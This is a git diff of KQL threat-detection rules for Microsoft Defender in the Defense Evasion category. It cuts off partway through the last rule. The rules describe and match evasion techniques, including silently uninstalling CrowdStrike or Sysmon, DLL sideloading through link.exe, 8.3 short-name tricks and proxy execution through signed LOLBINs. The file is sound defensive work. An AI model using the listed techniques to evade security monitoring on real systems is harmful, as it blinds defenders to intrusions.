a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql index b3cae963..9e3fa150 100644 --- a/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql +++ b/KQL/rules/Defense Evasion/uncommon_filesystem_load_attempt_by_format_com.kql @@ -1,10 +1,10 @@ -// Title: Uncommon FileSystem Load Attempt By Format.com -// Author: Florian Roth (Nextron Systems) -// Date: 2022-01-04 -// Level: high -// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion - -DeviceProcessEvents +// Title: Uncommon FileSystem Load Attempt By Format.com +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-04 +// Level: high +// Description: Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents | where (ProcessCommandLine contains "/fs:" and FolderPath endswith "\\format.com") and (not((ProcessCommandLine contains "/fs:exFAT" or ProcessCommandLine contains "/fs:FAT" or ProcessCommandLine contains "/fs:NTFS" or ProcessCommandLine contains "/fs:ReFS" or ProcessCommandLine contains "/fs:UDF"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql index 1ada023b..70c2b25e 100644 --- a/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_link_exe_parent_process.kql @@ -1,14 +1,14 @@ -// Title: Uncommon Link.EXE Parent Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-22 -// Level: medium -// Description: Detects an uncommon parent process of "LINK.EXE". -// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. -// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. -// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. -// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Uncommon Link.EXE Parent Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-22 +// Level: medium +// Description: Detects an uncommon parent process of "LINK.EXE". +// Link.EXE in Microsoft incremental linker. Its a utility usually bundled with Visual Studio installation. +// Multiple utilities often found in the same folder (editbin.exe, dumpbin.exe, lib.exe, etc) have a hardcode call to the "LINK.EXE" binary without checking its validity. +// This would allow an attacker to sideload any binary with the name "link.exe" if one of the aforementioned tools get executed from a different location. +// By filtering the known locations of such utilities we can spot uncommon parent process of LINK.EXE that might be suspicious or malicious. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains "LINK /" and FolderPath endswith "\\link.exe") and (not(((InitiatingProcessFolderPath contains "\\VC\\bin\\" or InitiatingProcessFolderPath contains "\\VC\\Tools\\") and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql index b6d06909..a462c4d5 100644 --- a/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql +++ b/KQL/rules/Defense Evasion/uncommon_outbound_kerberos_connection.kql @@ -1,12 +1,12 @@ -// Title: Uncommon Outbound Kerberos Connection -// Author: Ilyas Ochkov, oscd.community -// Date: 2019-10-24 -// Level: medium -// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003 -// False Positives: -// - Web Browsers and third party application might generate similar activity. An initial baseline is required. - -DeviceNetworkEvents +// Title: Uncommon Outbound Kerberos Connection +// Author: Ilyas Ochkov, oscd.community +// Date: 2019-10-24 +// Level: medium +// Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.t1558, attack.lateral-movement, attack.t1550.003 +// False Positives: +// - Web Browsers and third party application might generate similar activity. An initial baseline is required. + +DeviceNetworkEvents | where RemotePort == 88 and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\lsass.exe")) and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe", "C:\\Program Files\\Mozilla Firefox\\firefox.exe")) or InitiatingProcessFolderPath endswith "\\tomcat\\bin\\tomcat8.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql index 726a5a94..03cd851a 100644 --- a/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_sigverif_exe_child_process.kql @@ -1,10 +1,10 @@ -// Title: Uncommon Sigverif.EXE Child Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-19 -// Level: medium -// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: Uncommon Sigverif.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: medium +// Description: Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\sigverif.exe" and (not((FolderPath in~ ("C:\\Windows\\System32\\WerFault.exe", "C:\\Windows\\SysWOW64\\WerFault.exe")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql index 5148e8ca..1813d0e3 100644 --- a/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql +++ b/KQL/rules/Defense Evasion/uncommon_svchost_parent_process.kql @@ -1,10 +1,10 @@ -// Title: Uncommon Svchost Parent Process -// Author: Florian Roth (Nextron Systems) -// Date: 2017-08-15 -// Level: medium -// Description: Detects an uncommon svchost parent process -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1036.005 - -DeviceProcessEvents +// Title: Uncommon Svchost Parent Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-08-15 +// Level: medium +// Description: Detects an uncommon svchost parent process +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036.005 + +DeviceProcessEvents | where FolderPath endswith "\\svchost.exe" and (not(((InitiatingProcessFolderPath endswith "\\Mrt.exe" or InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\ngen.exe" or InitiatingProcessFolderPath endswith "\\rpcnet.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\TiWorker.exe") or (InitiatingProcessFolderPath in~ ("-", "")) or isnull(InitiatingProcessFolderPath)))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql index 7bd9719b..c7808e5d 100644 --- a/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql +++ b/KQL/rules/Defense Evasion/uninstall_crowdstrike_falcon_sensor.kql @@ -1,12 +1,12 @@ -// Title: Uninstall Crowdstrike Falcon Sensor -// Author: frack113 -// Date: 2021-07-12 -// Level: high -// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated - -DeviceProcessEvents +// Title: Uninstall Crowdstrike Falcon Sensor +// Author: frack113 +// Date: 2021-07-12 +// Level: high +// Description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated + +DeviceProcessEvents | where ProcessCommandLine contains "\\WindowsSensor.exe" and ProcessCommandLine contains " /uninstall" and ProcessCommandLine contains " /quiet" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql index 5dea738a..3589c35f 100644 --- a/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql +++ b/KQL/rules/Defense Evasion/uninstall_sysinternals_sysmon.kql @@ -1,12 +1,12 @@ -// Title: Uninstall Sysinternals Sysmon -// Author: frack113 -// Date: 2022-01-12 -// Level: high -// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1562.001 -// False Positives: -// - Legitimate administrators might use this command to remove Sysmon for debugging purposes - -DeviceProcessEvents +// Title: Uninstall Sysinternals Sysmon +// Author: frack113 +// Date: 2022-01-12 +// Level: high +// Description: Detects the removal of Sysmon, which could be a potential attempt at defense evasion +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate administrators might use this command to remove Sysmon for debugging purposes + +DeviceProcessEvents | where (ProcessCommandLine contains "-u" or ProcessCommandLine contains "/u" or ProcessCommandLine contains "–u" or ProcessCommandLine contains "—u" or ProcessCommandLine contains "―u") and ((FolderPath endswith "\\Sysmon64.exe" or FolderPath endswith "\\Sysmon.exe") or ProcessVersionInfoFileDescription =~ "System activity monitor") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql index 59fa3860..d67baf90 100644 --- a/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql +++ b/KQL/rules/Defense Evasion/unmount_share_via_net_exe.kql @@ -1,12 +1,12 @@ -// Title: Unmount Share Via Net.EXE -// Author: oscd.community, @redcanary, Zach Stanford @svch0st -// Date: 2020-10-08 -// Level: low -// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1070.005 -// False Positives: -// - Administrators or Power users may remove their shares via cmd line - -DeviceProcessEvents +// Title: Unmount Share Via Net.EXE +// Author: oscd.community, @redcanary, Zach Stanford @svch0st +// Date: 2020-10-08 +// Level: low +// Description: Detects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.005 +// False Positives: +// - Administrators or Power users may remove their shares via cmd line + +DeviceProcessEvents | where (ProcessCommandLine contains "share" and ProcessCommandLine contains "/delete") and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql index ad0992df..703f96e4 100644 --- a/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql +++ b/KQL/rules/Defense Evasion/use_icacls_to_hide_file_to_everyone.kql @@ -1,10 +1,10 @@ -// Title: Use Icacls to Hide File to Everyone -// Author: frack113 -// Date: 2022-07-18 -// Level: medium -// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.001 - -DeviceProcessEvents +// Title: Use Icacls to Hide File to Everyone +// Author: frack113 +// Date: 2022-07-18 +// Level: medium +// Description: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "/deny" and ProcessCommandLine contains "S-1-1-0:") and (ProcessVersionInfoOriginalFileName =~ "iCACLS.EXE" or FolderPath endswith "\\icacls.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql index 5b5c1d72..f9359f4f 100644 --- a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql +++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_command_line.kql @@ -1,12 +1,12 @@ -// Title: Use NTFS Short Name in Command Line -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-05 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 -// False Positives: -// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. - -DeviceProcessEvents +// Title: Use NTFS Short Name in Command Line +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-05 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. + +DeviceProcessEvents | where (ProcessCommandLine contains "~1.exe" or ProcessCommandLine contains "~1.bat" or ProcessCommandLine contains "~1.msi" or ProcessCommandLine contains "~1.vbe" or ProcessCommandLine contains "~1.vbs" or ProcessCommandLine contains "~1.dll" or ProcessCommandLine contains "~1.ps1" or ProcessCommandLine contains "~1.js" or ProcessCommandLine contains "~1.hta" or ProcessCommandLine contains "~2.exe" or ProcessCommandLine contains "~2.bat" or ProcessCommandLine contains "~2.msi" or ProcessCommandLine contains "~2.vbe" or ProcessCommandLine contains "~2.vbs" or ProcessCommandLine contains "~2.dll" or ProcessCommandLine contains "~2.ps1" or ProcessCommandLine contains "~2.js" or ProcessCommandLine contains "~2.hta") and (not(((InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe") or ProcessCommandLine contains "C:\\xampp\\vcredist\\VCREDI~1.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql index f6793daf..c8eaec20 100644 --- a/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql +++ b/KQL/rules/Defense Evasion/use_ntfs_short_name_in_image.kql @@ -1,12 +1,12 @@ -// Title: Use NTFS Short Name in Image -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-06 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 -// False Positives: -// - Software Installers - -DeviceProcessEvents +// Title: Use NTFS Short Name in Image +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-06 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Software Installers + +DeviceProcessEvents | where (FolderPath contains "~1.bat" or FolderPath contains "~1.dll" or FolderPath contains "~1.exe" or FolderPath contains "~1.hta" or FolderPath contains "~1.js" or FolderPath contains "~1.msi" or FolderPath contains "~1.ps1" or FolderPath contains "~1.tmp" or FolderPath contains "~1.vbe" or FolderPath contains "~1.vbs" or FolderPath contains "~2.bat" or FolderPath contains "~2.dll" or FolderPath contains "~2.exe" or FolderPath contains "~2.hta" or FolderPath contains "~2.js" or FolderPath contains "~2.msi" or FolderPath contains "~2.ps1" or FolderPath contains "~2.tmp" or FolderPath contains "~2.vbe" or FolderPath contains "~2.vbs") and (not(InitiatingProcessFolderPath =~ "C:\\Windows\\explorer.exe")) and (not((InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or FolderPath endswith "\\VCREDI~1.EXE" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe" or FolderPath =~ "C:\\PROGRA~1\\WinZip\\WZPREL~1.EXE"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_remote_exe.kql b/KQL/rules/Defense Evasion/use_of_remote_exe.kql index 5c626cf3..879e9f91 100644 --- a/KQL/rules/Defense Evasion/use_of_remote_exe.kql +++ b/KQL/rules/Defense Evasion/use_of_remote_exe.kql @@ -1,12 +1,12 @@ -// Title: Use of Remote.exe -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-02 -// Level: medium -// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 -// False Positives: -// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). - -DeviceProcessEvents +// Title: Use of Remote.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-02 +// Level: medium +// Description: Remote.exe is part of WinDbg in the Windows SDK and can be used for AWL bypass and running remote files. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Approved installs of Windows SDK with Debugging Tools for Windows (WinDbg). + +DeviceProcessEvents | where FolderPath endswith "\\remote.exe" or ProcessVersionInfoOriginalFileName =~ "remote.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql index d7c98ec2..944937e1 100644 --- a/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql +++ b/KQL/rules/Defense Evasion/use_of_scriptrunner_exe.kql @@ -1,12 +1,12 @@ -// Title: Use of Scriptrunner.exe -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-01 -// Level: medium -// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 -// False Positives: -// - Legitimate use when App-v is deployed - -DeviceProcessEvents +// Title: Use of Scriptrunner.exe +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-01 +// Level: medium +// Description: The "ScriptRunner.exe" binary can be abused to proxy execution through it and bypass possible whitelisting +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 +// False Positives: +// - Legitimate use when App-v is deployed + +DeviceProcessEvents | where ProcessCommandLine contains " -appvscript " and (FolderPath endswith "\\ScriptRunner.exe" or ProcessVersionInfoOriginalFileName =~ "ScriptRunner.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql index 64aa3ad8..416722e3 100644 --- a/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql +++ b/KQL/rules/Defense Evasion/use_of_the_sftp_exe_binary_as_a_lolbin.kql @@ -1,10 +1,10 @@ -// Title: Use Of The SFTP.EXE Binary As A LOLBIN -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-11-10 -// Level: medium -// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.execution, attack.t1218 - -DeviceProcessEvents +// Title: Use Of The SFTP.EXE Binary As A LOLBIN +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-11-10 +// Level: medium +// Description: Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1218 + +DeviceProcessEvents | where (ProcessCommandLine contains " -D .." or ProcessCommandLine contains " -D C:\\") and FolderPath endswith "\\sftp.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql index e1a365f2..5fe53ce7 100644 --- a/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql +++ b/KQL/rules/Defense Evasion/use_of_ttdinject_exe.kql @@ -1,12 +1,12 @@ -// Title: Use of TTDInject.exe -// Author: frack113 -// Date: 2022-05-16 -// Level: medium -// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: Use of TTDInject.exe +// Author: frack113 +// Date: 2022-05-16 +// Level: medium +// Description: Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe) +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where FolderPath endswith "ttdinject.exe" or ProcessVersionInfoOriginalFileName =~ "TTDInject.EXE" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql index 4baa59bb..96eafd5f 100644 --- a/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql +++ b/KQL/rules/Defense Evasion/use_of_visualuiaverifynative_exe.kql @@ -1,12 +1,12 @@ -// Title: Use of VisualUiaVerifyNative.exe -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-01 -// Level: medium -// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 -// False Positives: -// - Legitimate testing of Microsoft UI parts. - -DeviceProcessEvents +// Title: Use of VisualUiaVerifyNative.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-01 +// Level: medium +// Description: VisualUiaVerifyNative.exe is a Windows SDK that can be used for AWL bypass and is listed in Microsoft's recommended block rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Legitimate testing of Microsoft UI parts. + +DeviceProcessEvents | where FolderPath endswith "\\VisualUiaVerifyNative.exe" or ProcessVersionInfoOriginalFileName =~ "VisualUiaVerifyNative.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql index 11a3ceae..75a70dc7 100644 --- a/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql +++ b/KQL/rules/Defense Evasion/use_of_vsiisexelauncher_exe.kql @@ -1,10 +1,10 @@ -// Title: Use of VSIISExeLauncher.exe -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-06-09 -// Level: medium -// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 - -DeviceProcessEvents +// Title: Use of VSIISExeLauncher.exe +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-09 +// Level: medium +// Description: The "VSIISExeLauncher.exe" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 + +DeviceProcessEvents | where (ProcessCommandLine contains " -p " or ProcessCommandLine contains " -a ") and (FolderPath endswith "\\VSIISExeLauncher.exe" or ProcessVersionInfoOriginalFileName =~ "VSIISExeLauncher.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql index c440a601..10806bbe 100644 --- a/KQL/rules/Defense Evasion/use_of_wfc_exe.kql +++ b/KQL/rules/Defense Evasion/use_of_wfc_exe.kql @@ -1,12 +1,12 @@ -// Title: Use of Wfc.exe -// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io -// Date: 2022-06-01 -// Level: medium -// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1127 -// False Positives: -// - Legitimate use by a software developer - -DeviceProcessEvents +// Title: Use of Wfc.exe +// Author: Christopher Peacock @SecurePeacock, SCYTHE @scythe_io +// Date: 2022-06-01 +// Level: medium +// Description: The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1127 +// False Positives: +// - Legitimate use by a software developer + +DeviceProcessEvents | where FolderPath endswith "\\wfc.exe" or ProcessVersionInfoOriginalFileName =~ "wfc.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql index 0b23b5b7..b47db9bf 100644 --- a/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql +++ b/KQL/rules/Defense Evasion/use_short_name_path_in_image.kql @@ -1,12 +1,12 @@ -// Title: Use Short Name Path in Image -// Author: frack113, Nasreddine Bencherchali -// Date: 2022-08-07 -// Level: medium -// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1564.004 -// False Positives: -// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. - -DeviceProcessEvents +// Title: Use Short Name Path in Image +// Author: frack113, Nasreddine Bencherchali +// Date: 2022-08-07 +// Level: medium +// Description: Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 +// False Positives: +// - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. + +DeviceProcessEvents | where (FolderPath contains "~1\\" or FolderPath contains "~2\\") and (not((((FolderPath contains "\\AppData\\" and FolderPath contains "\\Temp\\") or (FolderPath endswith "~1\\unzip.exe" or FolderPath endswith "~1\\7zG.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Dism.exe", "C:\\Windows\\System32\\cleanmgr.exe"))))) and (not(((ProcessVersionInfoProductName =~ "InstallShield (R)" or ProcessVersionInfoFileDescription =~ "InstallShield (R) Setup Engine" or ProcessVersionInfoCompanyName =~ "InstallShield Software Corporation") or InitiatingProcessFolderPath endswith "\\thor\\thor64.exe" or InitiatingProcessFolderPath endswith "\\WebEx\\WebexHost.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql index bd08cdeb..a7ca7eff 100644 --- a/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql +++ b/KQL/rules/Defense Evasion/utilityfunctions_ps1_proxy_dll.kql @@ -1,10 +1,10 @@ -// Title: UtilityFunctions.ps1 Proxy Dll -// Author: frack113 -// Date: 2022-05-28 -// Level: medium -// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1216 - -DeviceProcessEvents +// Title: UtilityFunctions.ps1 Proxy Dll +// Author: frack113 +// Date: 2022-05-28 +// Level: medium +// Description: Detects the use of a Microsoft signed script executing a managed DLL with PowerShell. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents | where ProcessCommandLine contains "UtilityFunctions.ps1" or ProcessCommandLine contains "RegSnapin " \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql index 60a0d7e0..2819ae55 100644 --- a/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql +++ b/KQL/rules/Defense Evasion/verclsid_exe_runs_com_object.kql @@ -1,10 +1,10 @@ -// Title: Verclsid.exe Runs COM Object -// Author: Victor Sergeev, oscd.community -// Date: 2020-10-09 -// Level: medium -// Description: Detects when verclsid.exe is used to run COM object via GUID -// MITRE Tactic: Defense Evasion -// Tags: attack.defense-evasion, attack.t1218 - -DeviceProcessEvents +// Title: Verclsid.exe Runs COM Object +// Author: Victor Sergeev, oscd.community +// Date: 2020-10-09 